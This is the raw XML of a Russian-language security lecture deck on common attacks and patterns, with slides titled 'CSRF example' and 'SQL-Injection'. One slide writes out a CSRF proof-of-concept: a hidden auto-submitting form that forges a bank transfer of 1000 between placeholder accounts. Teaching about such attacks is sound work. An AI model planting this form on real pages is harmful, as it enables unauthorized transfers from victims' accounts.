              <a:t>target</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csrf-frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name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type</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value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transaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name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action</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value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send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name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sender</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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"DE12345123451234512345"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name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recipient</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value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"DE@0000111112222233333"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name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amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"1000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>type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hidden</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name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"Transfer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> CSRF"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>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form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>typ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>e=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>avascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>docunent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="E165A6"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>csrf_form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0" err="1">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>.submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" dirty="0">
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E6B5B28-61BB-413E-A8DC-9AA6BFEABF04}"/>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panose="02000503030000020004"/>
              </a:rPr>
              <a:t>Пример </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379190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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACDE519C-9840-46B6-BCF0-47494EF2E9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640264" y="898072"/>
            <a:ext cx="8738935" cy="833746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="6600" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="TT Hoves DemiBold" panose="02000503030000020004"/>
              </a:rPr>
              <a:t>SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5400" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="TT Hoves" panose="02000503030000020004"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1937438726"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Тема Office">
  <a:themeElements>
    <a:clrScheme name="Positive Technologies">
      <a:dk1>
        <a:srgbClr val="212121"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="BCCBDD"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D8E0EB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FF0000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="6EC4EA"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="A67497"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="88D6A3"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF8780"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="FF4FA3"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="7A7A7A"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="FFCCCC"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Positive Technologies">
      <a:majorFont>
        <a:latin typeface="Verdana Bold"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Verdan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4283</TotalTime>
  <Words>5507</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Широкоэкранный</PresentationFormat>
  <Paragraphs>283</Paragraphs>
  <Slides>29</Slides>
  <Notes>22</Notes>
  <HiddenSlides>1</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Использованные шрифты</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>11</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Тема</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Заголовки слайдов</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>29</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="41" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HelveticaNeue</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>TT Hoves</vt:lpstr>
      <vt:lpstr>TT Hoves DemiBold</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Verdana Bold</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>Основные атаки и паттерны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Софроновы</dc:creator>
  <cp:lastModifiedBy>Александр Кузнецов</cp:lastModifiedBy>
  <cp:revision>113</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-05T14:52:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-06-20T14:25:25Z</dcterms:modified>
</cp:coreProperties>
</file>